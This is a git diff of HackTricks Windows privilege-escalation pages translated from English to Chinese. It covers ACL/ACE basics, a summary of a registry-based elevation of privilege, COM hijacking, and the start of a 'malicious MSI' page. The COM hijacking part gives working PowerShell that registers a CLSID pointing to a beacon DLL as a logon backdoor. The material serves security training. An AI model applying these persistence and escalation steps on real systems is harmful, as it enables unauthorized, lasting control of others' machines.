-Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
+在这些教程中了解更多关于令牌的信息：[https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) 和 [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index 555657d79..5ba64adf8 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -3,163 +3,163 @@
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces" %}
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## **Access Control List (ACL)**
+## **访问控制列表 (ACL)**
 
-An Access Control List (ACL) consists of an ordered set of Access Control Entries (ACEs) that dictate the protections for an object and its properties. In essence, an ACL defines which actions by which security principals (users or groups) are permitted or denied on a given object.
+访问控制列表 (ACL) 由一组有序的访问控制条目 (ACE) 组成，这些条目规定了对象及其属性的保护。实质上，ACL 定义了哪些安全主体（用户或组）可以或不可以对给定对象执行哪些操作。
 
-There are two types of ACLs:
+ACL 有两种类型：
 
-- **Discretionary Access Control List (DACL):** Specifies which users and groups have or do not have access to an object.
-- **System Access Control List (SACL):** Governs the auditing of access attempts to an object.
+- **自主访问控制列表 (DACL)：** 指定哪些用户和组可以或不能访问对象。
+- **系统访问控制列表 (SACL)：** 管理对对象的访问尝试的审计。
 
-The process of accessing a file involves the system checking the object's security descriptor against the user's access token to determine if access should be granted and the extent of that access, based on the ACEs.
+访问文件的过程涉及系统检查对象的安全描述符与用户的访问令牌，以确定是否应授予访问权限以及访问的范围，基于 ACE。
 
-### **Key Components**
+### **关键组件**
 
-- **DACL:** Contains ACEs that grant or deny access permissions to users and groups for an object. It's essentially the main ACL that dictates access rights.
-- **SACL:** Used for auditing access to objects, where ACEs define the types of access to be logged in the Security Event Log. This can be invaluable for detecting unauthorized access attempts or troubleshooting access issues.
+- **DACL：** 包含授予或拒绝用户和组对对象的访问权限的 ACE。它本质上是决定访问权限的主要 ACL。
+- **SACL：** 用于审计对对象的访问，其中 ACE 定义了在安全事件日志中记录的访问类型。这对于检测未经授权的访问尝试或排除访问问题非常宝贵。
 
-### **System Interaction with ACLs**
+### **系统与 ACL 的交互**
 
-Each user session is associated with an access token that contains security information relevant to that session, including user, group identities, and privileges. This token also includes a logon SID that uniquely identifies the session.
+每个用户会话都与一个访问令牌相关联，该令牌包含与该会话相关的安全信息，包括用户、组身份和特权。该令牌还包括一个唯一标识会话的登录 SID。
 
-The Local Security Authority (LSASS) processes access requests to objects by examining the DACL for ACEs that match the security principal attempting access. Access is immediately granted if no relevant ACEs are found. Otherwise, LSASS compares the ACEs against the security principal's SID in the access token to determine access eligibility.
+本地安全机构 (LSASS) 通过检查 DACL 中与尝试访问的安全主体匹配的 ACE 来处理对对象的访问请求。如果未找到相关的 ACE，则立即授予访问权限。否则，LSASS 将 ACE 与访问令牌中的安全主体 SID 进行比较，以确定访问资格。
 
-### **Summarized Process**
+### **总结过程**
 
-- **ACLs:** Define access permissions through DACLs and audit rules through SACLs.
-- **Access Token:** Contains user, group, and privilege information for a session.
-- **Access Decision:** Made by comparing DACL ACEs with the access token; SACLs are used for auditing.
+- **ACLs：** 通过 DACL 定义访问权限，通过 SACL 定义审计规则。
+- **访问令牌：** 包含会话的用户、组和特权信息。
+- **访问决策：** 通过将 DACL ACE 与访问令牌进行比较来做出；SACL 用于审计。
 
 ### ACEs
 
-There arey **three main types of Access Control Entries (ACEs)**:
+有 **三种主要类型的访问控制条目 (ACE)**：
 
-- **Access Denied ACE**: This ACE explicitly denies access to an object for specified users or groups (in a DACL).
-- **Access Allowed ACE**: This ACE explicitly grants access to an object for specified users or groups (in a DACL).
-- **System Audit ACE**: Positioned within a System Access Control List (SACL), this ACE is responsible for generating audit logs upon access attempts to an object by users or groups. It documents whether access was allowed or denied and the nature of the access.
+- **拒绝访问 ACE：** 此 ACE 明确拒绝指定用户或组（在 DACL 中）对对象的访问。
+- **允许访问 ACE：** 此 ACE 明确授予指定用户或组（在 DACL 中）对对象的访问。
+- **系统审计 ACE：** 位于系统访问控制列表 (SACL) 中，此 ACE 负责在用户或组尝试访问对象时生成审计日志。它记录访问是否被允许或拒绝以及访问的性质。
 
-Each ACE has **four critical components**:
+每个 ACE 有 **四个关键组件**：
 
-1. The **Security Identifier (SID)** of the user or group (or their principal name in a graphical representation).
-2. A **flag** that identifies the ACE type (access denied, allowed, or system audit).
-3. **Inheritance flags** that determine if child objects can inherit the ACE from their parent.
-4. An [**access mask**](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b?redirectedfrom=MSDN), a 32-bit value specifying the object's granted rights.
+1. 用户或组的 **安全标识符 (SID)**（或其在图形表示中的主体名称）。
+2. 一个 **标志**，标识 ACE 类型（拒绝、允许或系统审计）。
+3. **继承标志**，确定子对象是否可以从其父对象继承 ACE。
+4. 一个 [**访问掩码**](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b?redirectedfrom=MSDN)，一个 32 位值，指定对象的授予权限。
 
-Access determination is conducted by sequentially examining each ACE until:
+访问确定是通过依次检查每个 ACE 进行的，直到：
 
-- An **Access-Denied ACE** explicitly denies the requested rights to a trustee identified in the access token.
-- **Access-Allowed ACE(s)** explicitly grant all requested rights to a trustee in the access token.
-- Upon checking all ACEs, if any requested right has **not been explicitly allowed**, access is implicitly **denied**.
+- 一个 **拒绝访问 ACE** 明确拒绝对访问令牌中标识的受托人的请求权限。
+- **允许访问 ACE** 明确授予访问令牌中受托人的所有请求权限。
+- 检查所有 ACE 后，如果任何请求的权限 **未被明确允许**，则访问被隐式 **拒绝**。
 
-### Order of ACEs
+### ACEs 的顺序
 
-The way **ACEs** (rules that say who can or cannot access something) are put in a list called **DACL** is very important. This is because once the system gives or denies access based on these rules, it stops looking at the rest.
+**ACEs**（规则，说明谁可以或不能访问某物）在称为 **DACL** 的列表中的排列方式非常重要。这是因为一旦系统根据这些规则授予或拒绝访问，它就停止查看其余的规则。
 
-There is a best way to organize these ACEs, and it is called **"canonical order."** This method helps make sure everything works smoothly and fairly. Here is how it goes for systems like **Windows 2000** and **Windows Server 2003**:
+有一种最佳的组织这些 ACE 的方式，称为 **“规范顺序。”** 这种方法有助于确保一切顺利和公平。对于像 **Windows 2000** 和 **Windows Server 2003** 这样的系统，顺序如下：
 
-- First, put all the rules that are made **specifically for this item** before the ones that come from somewhere else, like a parent folder.
-- In those specific rules, put the ones that say **"no" (deny)** before the ones that say **"yes" (allow)**.
-- For the rules that come from somewhere else, start with the ones from the **closest source**, like the parent, and then go back from there. Again, put **"no"** before **"yes."**
+- 首先，将所有 **专门为此项** 制定的规则放在来自其他地方（如父文件夹）的规则之前。
+- 在这些特定规则中，将 **“不允许”（拒绝）** 的规则放在 **“允许”（允许）** 的规则之前。
+- 对于来自其他地方的规则，从 **最近的来源** 开始，例如父级，然后向后排列。同样，将 **“不允许”** 放在 **“允许”** 之前。
 
-This setup helps in two big ways:
+这种设置有两个主要好处：
 
-- It makes sure that if there is a specific **"no,"** it is respected, no matter what other **"yes"** rules are there.
-- It lets the owner of an item have the **final say** on who gets in, before any rules from parent folders or further back come into play.
+- 确保如果有特定的 **“不允许”**，无论其他 **“允许”** 规则是什么，都得到尊重。
+- 让项目的所有者在任何来自父文件夹或更远的规则生效之前，拥有 **最终决定权**。
 
-By doing things this way, the owner of a file or folder can be very precise about who gets access, making sure the right people can get in and the wrong ones can't.
+通过这种方式，文件或文件夹的所有者可以非常精确地控制谁可以访问，确保正确的人可以进入，而错误的人不能。
 
 ![](https://www.ntfs.com/images/screenshots/ACEs.gif)
 
-So, this **"canonical order"** is all about making sure the access rules are clear and work well, putting specific rules first and organizing everything in a smart way.
+因此，这种 **“规范顺序”** 旨在确保访问规则清晰且有效，优先考虑特定规则，并以智能的方式组织一切。
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
-### GUI Example
+### GUI 示例
 
-[**Example from here**](https://secureidentity.se/acl-dacl-sacl-and-the-ace/)
+[**来自这里的示例**](https://secureidentity.se/acl-dacl-sacl-and-the-ace/)
 
-This is the classic security tab of a folder showing the ACL, DACL and ACEs:
+这是一个文件夹的经典安全选项卡，显示了 ACL、DACL 和 ACE：
 
 ![http://secureidentity.se/wp-content/uploads/2014/04/classicsectab.jpg](../../images/classicsectab.jpg)
 
-If we click the **Advanced button** we will get more options like inheritance:
+如果我们点击 **高级按钮**，将获得更多选项，如继承：
 
 ![http://secureidentity.se/wp-content/uploads/2014/04/aceinheritance.jpg](../../images/aceinheritance.jpg)
 
-And if you add or edit a Security Principal:
+如果您添加或编辑安全主体：
 
 ![http://secureidentity.se/wp-content/uploads/2014/04/editseprincipalpointers1.jpg](../../images/editseprincipalpointers1.jpg)
 
-And last we have the SACL in the Auditing tab:
+最后，我们在审计选项卡中有 SACL：
 
 ![http://secureidentity.se/wp-content/uploads/2014/04/audit-tab.jpg](../../images/audit-tab.jpg)
 
-### Explaining Access Control in a Simplified Manner
+### 以简化的方式解释访问控制
 
-When managing access to resources, like a folder, we use lists and rules known as Access Control Lists (ACLs) and Access Control Entries (ACEs). These define who can or cannot access certain data.
+在管理对资源（如文件夹）的访问时，我们使用称为访问控制列表 (ACL) 和访问控制条目 (ACE) 的列表和规则。这些定义了谁可以或不能访问某些数据。
 
-#### Denying Access to a Specific Group
+#### 拒绝特定组的访问
 
-Imagine you have a folder named Cost, and you want everyone to access it except for a marketing team. By setting up the rules correctly, we can ensure that the marketing team is explicitly denied access before allowing everyone else. This is done by placing the rule to deny access to the marketing team before the rule that allows access to everyone.
+想象一下，您有一个名为 Cost 的文件夹，您希望除了市场团队外，所有人都可以访问。通过正确设置规则，我们可以确保市场团队被明确拒绝访问，然后再允许其他所有人。这是通过将拒绝市场团队访问的规则放在允许所有人访问的规则之前来实现的。
 
-#### Allowing Access to a Specific Member of a Denied Group
+#### 允许被拒绝组的特定成员访问
 
-Let's say Bob, the marketing director, needs access to the Cost folder, even though the marketing team generally shouldn't have access. We can add a specific rule (ACE) for Bob that grants him access, and place it before the rule that denies access to the marketing team. This way, Bob gets access despite the general restriction on his team.
+假设市场总监 Bob 需要访问 Cost 文件夹，尽管市场团队通常不应该有访问权限。我们可以为 Bob 添加一个特定的规则 (ACE)，授予他访问权限，并将其放在拒绝市场团队访问的规则之前。这样，尽管对他的团队有一般限制，Bob 仍然可以访问。
 
-#### Understanding Access Control Entries
+#### 理解访问控制条目
 
-ACEs are the individual rules in an ACL. They identify users or groups, specify what access is allowed or denied, and determine how these rules apply to sub-items (inheritance). There are two main types of ACEs:
+ACE 是 ACL 中的单个规则。它们识别用户或组，指定允许或拒绝的访问，并确定这些规则如何适用于子项（继承）。ACE 主要有两种类型：
 
-- **Generic ACEs**: These apply broadly, affecting either all types of objects or distinguishing only between containers (like folders) and non-containers (like files). For example, a rule that allows users to see the contents of a folder but not to access the files within it.
-- **Object-Specific ACEs**: These provide more precise control, allowing rules to be set for specific types of objects or even individual properties within an object. For instance, in a directory of users, a rule might allow a user to update their phone number but not their login hours.
+- **通用 ACE：** 这些规则广泛适用，影响所有类型的对象，或仅区分容器（如文件夹）和非容器（如文件）。例如，允许用户查看文件夹内容但不允许访问其中的文件的规则。
+- **对象特定 ACE：** 这些提供更精确的控制，允许为特定类型的对象或对象内的单个属性设置规则。例如，在用户目录中，规则可能允许用户更新其电话号码，但不允许更新其登录时间。
 
-Each ACE contains important information like who the rule applies to (using a Security Identifier or SID), what the rule allows or denies (using an access mask), and how it's inherited by other objects.
+每个 ACE 包含重要信息，例如规则适用的对象（使用安全标识符或 SID）、规则允许或拒绝的内容（使用访问掩码）以及如何被其他对象继承。
 
-#### Key Differences Between ACE Types
+#### ACE 类型之间的关键区别
 
-- **Generic ACEs** are suitable for simple access control scenarios, where the same rule applies to all aspects of an object or to all objects within a container.
-- **Object-Specific ACEs** are used for more complex scenarios, especially in environments like Active Directory, where you might need to control access to specific properties of an object differently.
+- **通用 ACE** 适用于简单的访问控制场景，其中相同的规则适用于对象的所有方面或容器内的所有对象。
+- **对象特定 ACE** 用于更复杂的场景，特别是在 Active Directory 等环境中，您可能需要以不同的方式控制对对象特定属性的访问。
 
-In summary, ACLs and ACEs help define precise access controls, ensuring that only the right individuals or groups have access to sensitive information or resources, with the ability to tailor access rights down to the level of individual properties or object types.
+总之，ACL 和 ACE 有助于定义精确的访问控制，确保只有正确的个人或组可以访问敏感信息或资源，并能够将访问权限细化到单个属性或对象类型的级别。
 
-### Access Control Entry Layout
+### 访问控制条目布局
 
-| ACE Field   | Description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
+| ACE 字段   | 描述                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
 | ----------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| Type        | Flag that indicates the type of ACE. Windows 2000 and Windows Server 2003 support six types of ACE: Three generic ACE types that are attached to all securable objects. Three object-specific ACE types that can occur for Active Directory objects.                                                                                                                                                                                                                                                            |
-| Flags       | Set of bit flags that control inheritance and auditing.                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
-| Size        | Number of bytes of memory that are allocated for the ACE.                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
-| Access mask | 32-bit value whose bits correspond to access rights for the object. Bits can be set either on or off, but the setting's meaning depends on the ACE type. For example, if the bit that corresponds to the right to read permissions is turned on, and the ACE type is Deny, the ACE denies the right to read the object's permissions. If the same bit is set on but the ACE type is Allow, the ACE grants the right to read the object's permissions. More details of the Access mask appear in the next table. |
-| SID         | Identifies a user or group whose access is controlled or monitored by this ACE.                                                                                                                                                                                                                                                                                                                                                                                                                                 |
+| 类型        | 表示 ACE 类型的标志。Windows 2000 和 Windows Server 2003 支持六种类型的 ACE：三种通用 ACE 类型，附加到所有可安全对象。三种对象特定 ACE 类型，可以出现在 Active Directory 对象中。                                                                                                                                                                                                                                                                                                                            |
+| 标志       | 控制继承和审计的一组位标志。                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
+| 大小        | 为 ACE 分配的内存字节数。                                                                                                                                                                                                                                                                                                                                                                                                                                                       |
+| 访问掩码 | 32 位值，其位对应于对象的访问权限。位可以设置为开或关，但设置的含义取决于 ACE 类型。例如，如果对应于读取权限的位被打开，并且 ACE 类型为拒绝，则 ACE 拒绝读取对象的权限。如果同一位被打开，但 ACE 类型为允许，则 ACE 授予读取对象权限的权利。访问掩码的更多详细信息出现在下一个表中。 |
+| SID         | 标识由此 ACE 控制或监视访问的用户或组。                                                                                                                                                                                                                                                                                                                                                                                                                                 |
 
-### Access Mask Layout
+### 访问掩码布局
 
-| Bit (Range) | Meaning                            | Description/Example                       |
+| 位（范围） | 意义                            | 描述/示例                       |
 | ----------- | ---------------------------------- | ----------------------------------------- |
-| 0 - 15      | Object Specific Access Rights      | Read data, Execute, Append data           |
-| 16 - 22     | Standard Access Rights             | Delete, Write ACL, Write Owner            |
-| 23          | Can access security ACL            |                                           |
-| 24 - 27     | Reserved                           |                                           |
-| 28          | Generic ALL (Read, Write, Execute) | Everything below                          |
-| 29          | Generic Execute                    | All things necessary to execute a program |
-| 30          | Generic Write                      | All things necessary to write to a file   |
-| 31          | Generic Read                       | All things necessary to read a file       |
+| 0 - 15      | 对象特定访问权限      | 读取数据、执行、附加数据           |
+| 16 - 22     | 标准访问权限             | 删除、写入 ACL、写入所有者            |
+| 23          | 可以访问安全 ACL            |                                           |
+| 24 - 27     | 保留                           |                                           |
+| 28          | 通用所有（读取、写入、执行） | 下面的所有内容                          |
+| 29          | 通用执行                    | 执行程序所需的所有内容 |
+| 30          | 通用写入                      | 写入文件所需的所有内容   |
+| 31          | 通用读取                       | 读取文件所需的所有内容       |
 
-## References
+## 参考
 
 - [https://www.ntfs.com/ntfs-permissions-acl-use.htm](https://www.ntfs.com/ntfs-permissions-acl-use.htm)
 - [https://secureidentity.se/acl-dacl-sacl-and-the-ace/](https://secureidentity.se/acl-dacl-sacl-and-the-ace/)
@@ -170,8 +170,7 @@ In summary, ACLs and ACEs help define precise access controls, ensuring that onl
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces" %}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
index 8c2c0577c..2b380c72d 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
@@ -1,29 +1,28 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**The original post is** [**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/)
+**原始帖子是** [**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/)
 
-## Summary
+## 摘要
 
-Two registry keys were found to be writable by the current user:
+发现当前用户可以写入两个注册表项：
 
 - **`HKLM\SYSTEM\CurrentControlSet\Services\Dnscache`**
 - **`HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper`**
 
-It was suggested to check the permissions of the **RpcEptMapper** service using the **regedit GUI**, specifically the **Advanced Security Settings** window's **Effective Permissions** tab. This approach enables the assessment of granted permissions to specific users or groups without the need to examine each Access Control Entry (ACE) individually.
+建议使用 **regedit GUI** 检查 **RpcEptMapper** 服务的权限，特别是 **高级安全设置** 窗口的 **有效权限** 选项卡。这种方法可以评估特定用户或组的授予权限，而无需逐个检查每个访问控制条目 (ACE)。
 
-A screenshot showed the permissions assigned to a low-privileged user, among which the **Create Subkey** permission was notable. This permission, also referred to as **AppendData/AddSubdirectory**, corresponds with the script's findings.
+一张截图显示了分配给低权限用户的权限，其中 **创建子项** 权限尤为显著。该权限也称为 **AppendData/AddSubdirectory**，与脚本的发现相符。
 
-The inability to modify certain values directly, yet the capability to create new subkeys, was noted. An example highlighted was an attempt to alter the **ImagePath** value, which resulted in an access denied message.
+注意到无法直接修改某些值，但可以创建新的子项。一个突出的例子是尝试更改 **ImagePath** 值，结果显示访问被拒绝的消息。
 
-Despite these limitations, a potential for privilege escalation was identified through the possibility of leveraging the **Performance** subkey within the **RpcEptMapper** service's registry structure, a subkey not present by default. This could enable DLL registration and performance monitoring.
+尽管存在这些限制，但通过利用 **RpcEptMapper** 服务的注册表结构中的 **Performance** 子项，识别出潜在的权限提升机会，该子项默认情况下不存在。这可能使 DLL 注册和性能监控成为可能。
 
-Documentation on the **Performance** subkey and its utilization for performance monitoring was consulted, leading to the development of a proof-of-concept DLL. This DLL, demonstrating the implementation of **OpenPerfData**, **CollectPerfData**, and **ClosePerfData** functions, was tested via **rundll32**, confirming its operational success.
+查阅了关于 **Performance** 子项及其在性能监控中的使用的文档，开发了一个概念验证 DLL。该 DLL 演示了 **OpenPerfData**、**CollectPerfData** 和 **ClosePerfData** 函数的实现，通过 **rundll32** 测试，确认其操作成功。
 
-The goal was to coerce the **RPC Endpoint Mapper service** into loading the crafted Performance DLL. Observations revealed that executing WMI class queries related to Performance Data via PowerShell resulted in the creation of a log file, enabling the execution of arbitrary code under the **LOCAL SYSTEM** context, thus granting elevated privileges.
+目标是强制 **RPC Endpoint Mapper service** 加载精心制作的 Performance DLL。观察发现，通过 PowerShell 执行与性能数据相关的 WMI 类查询会导致创建日志文件，从而在 **LOCAL SYSTEM** 上下文中执行任意代码，从而授予提升的权限。
 
-The persistence and potential implications of this vulnerability were underscored, highlighting its relevance for post-exploitation strategies, lateral movement, and evasion of antivirus/EDR systems.
+强调了该漏洞的持久性和潜在影响，突显其在后期利用策略、横向移动和规避 antivirus/EDR 系统中的相关性。
 
-Although the vulnerability was initially disclosed unintentionally through the script, it was emphasized that its exploitation is constrained to outdated Windows versions (e.g., **Windows 7 / Server 2008 R2**) and requires local access.
+尽管该漏洞最初是通过脚本无意中披露的，但强调其利用仅限于过时的 Windows 版本（例如 **Windows 7 / Server 2008 R2**），并且需要本地访问。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
index 8fbd33416..86ed28a73 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
@@ -2,59 +2,56 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### Searching not existent COM components
+### 搜索不存在的 COM 组件
 
-As the values of HKCU can be modified by the users **COM Hijacking** could be used as a **persistent mechanisms**. Using `procmon` it's easy to find searched COM registries that doesn't exist that an attacker could create to persist. Filters:
+由于 HKCU 的值可以被用户修改，**COM Hijacking** 可以作为一种 **持久机制**。使用 `procmon` 很容易找到不存在的 COM 注册表项，攻击者可以创建这些项以实现持久化。过滤条件：
 
-- **RegOpenKey** operations.
-- where the _Result_ is **NAME NOT FOUND**.
-- and the _Path_ ends with **InprocServer32**.
-
-Once you have decided which not existent COM to impersonate execute the following commands. _Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill._&#x20;
+- **RegOpenKey** 操作。
+- 其中 _Result_ 为 **NAME NOT FOUND**。
+- 并且 _Path_ 以 **InprocServer32** 结尾。
 
+一旦你决定了要冒充哪个不存在的 COM，执行以下命令。_如果你决定冒充每几秒加载一次的 COM，请小心，因为这可能会过于激进。_
 ```bash
 New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
 New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
 New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
 ```
+### 可劫持的任务调度程序 COM 组件
 
-### Hijackable Task Scheduler COM components
+Windows 任务使用自定义触发器调用 COM 对象，由于它们是通过任务调度程序执行的，因此更容易预测它们何时会被触发。
 
-Windows Tasks use Custom Triggers to call COM objects and because they're executed through the Task Scheduler, it's easier to predict when they're gonna be triggered.
-
-<pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs
+<pre class="language-powershell"><code class="lang-powershell"># 显示 COM CLSIDs
 $Tasks = Get-ScheduledTask
 
 foreach ($Task in $Tasks)
 {
-  if ($Task.Actions.ClassId -ne $null)
-  {
-    if ($Task.Triggers.Enabled -eq $true)
-    {
-      $usersSid = "S-1-5-32-545"
-      $usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }
+if ($Task.Actions.ClassId -ne $null)
+{
+if ($Task.Triggers.Enabled -eq $true)
+{
+$usersSid = "S-1-5-32-545"
+$usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }
 
-      if ($Task.Principal.GroupId -eq $usersGroup)
-      {
-        Write-Host "Task Name: " $Task.TaskName
-        Write-Host "Task Path: " $Task.TaskPath
-        Write-Host "CLSID: " $Task.Actions.ClassId
-        Write-Host
-      }
-    }
-  }
+if ($Task.Principal.GroupId -eq $usersGroup)
+{
+Write-Host "任务名称: " $Task.TaskName
+Write-Host "任务路径: " $Task.TaskPath
+Write-Host "CLSID: " $Task.Actions.ClassId
+Write-Host
+}
+}
+}
 }
 
-# Sample Output:
-<strong># Task Name:  Example
-</strong># Task Path:  \Microsoft\Windows\Example\
+# 示例输出:
+<strong># 任务名称:  示例
+</strong># 任务路径:  \Microsoft\Windows\示例\
 # CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
-# [more like the previous one...]</code></pre>
+# [更多类似于前面的...]</code></pre>
 
-Checking the output you can select one that is going to be executed **every time a user logs in** for example.
-
-Now searching for the CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** in **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** and in HKLM and HKCU, you usually will find that the value doesn't exist in HKCU.
+检查输出后，您可以选择一个将在 **每次用户登录时** 执行的任务，例如。
 
+现在在 **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** 以及 HKLM 和 HKCU 中搜索 CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}**，通常会发现该值在 HKCU 中不存在。
 ```bash
 # Exists in HKCR\CLSID\
 Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
@@ -62,7 +59,7 @@ Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}
 Name           Property
 ----           --------
 InprocServer32 (default)      : C:\Windows\system32\some.dll
-               ThreadingModel : Both
+ThreadingModel : Both
 
 # Exists in HKLM
 Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
@@ -75,8 +72,6 @@ Name                                   Property
 PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
 Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
 ```
-
-Then, you can just create the HKCU entry and everytime the user logs in, your backdoor will be fired.
+然后，您可以创建 HKCU 条目，每次用户登录时，您的后门将被触发。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
index 05571cade..200d2a6de 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
@@ -1,13 +1,12 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# Creating Malicious MSI and Getting Root
+# 创建恶意 MSI 并获取 Root
 
-The creation of the MSI installer will be done using wixtools, specifically [wixtools](http://wixtoolset.org) will be utilized. It is worth mentioning that alternative MSI builders were attempted, but they were not successful in this particular case.
+MSI 安装程序的创建将使用 wixtools，具体来说，将利用 [wixtools](http://wixtoolset.org)。值得一提的是，尝试了其他 MSI 构建工具，但在这个特定案例中并未成功。
 
-For a comprehensive understanding of wix MSI usage examples, it is advisable to consult [this page](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with). Here, you can find various examples that demonstrate the usage of wix MSI.
-
-The aim is to generate an MSI that will execute the lnk file. In order to achieve this, the following XML code could be employed ([xml from here](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)):
+为了全面了解 wix MSI 的使用示例，建议查阅 [此页面](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with)。在这里，您可以找到各种示例，演示 wix MSI 的用法。
 
